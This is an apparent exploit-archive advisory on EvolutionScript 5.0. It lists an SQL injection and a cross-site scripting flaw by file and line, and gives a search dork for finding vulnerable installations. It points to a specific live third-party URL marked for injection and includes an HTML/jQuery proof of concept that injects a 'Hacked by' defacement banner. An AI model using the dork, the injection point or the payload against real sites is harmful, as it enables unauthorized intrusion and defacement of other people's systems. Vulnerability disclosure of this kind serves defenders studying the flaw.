EvolutionScript version 5.0 suffers from cross site scripting and remote SQL injection vulnerabilities.
c5a59b8a7d547e7c6ffb6b56fa66103d03b9b1b4c7641daccd5e845822ad604b
evolutionscript v5.0 Mullti Vulnerability
=========================================
Author : indoushka
Vondor : http://EvolutionScript.com
Dork : Powered by EvolutionScript Version 5.0 Copyright © 2010 - 2015 EvolutionScript.com
=========================
Sql injection :
C:\AppServ\www\EvolutionScript\includes\init.php
Line 145
mysqli::query
$todayis,$user_info['id']
poc: http://www.twickerz.com/bannerclick.php?id=15806 (inject her)
Xss :
C:\AppServ\www\EvolutionScript\includes\functions.php
Line 154
echo
$stored
XSS ( HTML Inject ) - jQuery v1.8.2 :
save the code in name.html and open it
<html>
<head>
<meta charset="utf-8">
<title>XSS ( HTML Inject ) - jQuery v1.8.2 </title>
<script src="http://127.0.0.1/EvolutionScript/js/jquery.min.js"></script>
<script>
$(function() {
$('#users').each(function() {
var select = $(this);
var option = select.children('option').first();
select.after(option.text());
select.hide();
});
});
</script>
</head>
<body>
<form method="post">
<p>
<select id="users" name="users">
<option value="xssreflected"><script><marquee><font color=lime size=32>Hacked by indoushka</font></marquee></script></option>
</select>
</p>
</form>
</body>
</html>
Greetz :
jericho http://attrition.org & http://www.osvdb.org/ * packetstormsecurity.com * http://is-sec.org/cc/
Hussin-X * Stake (www.v4-team.com) * D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be
---------------------------------------------------------------------------------------------------------------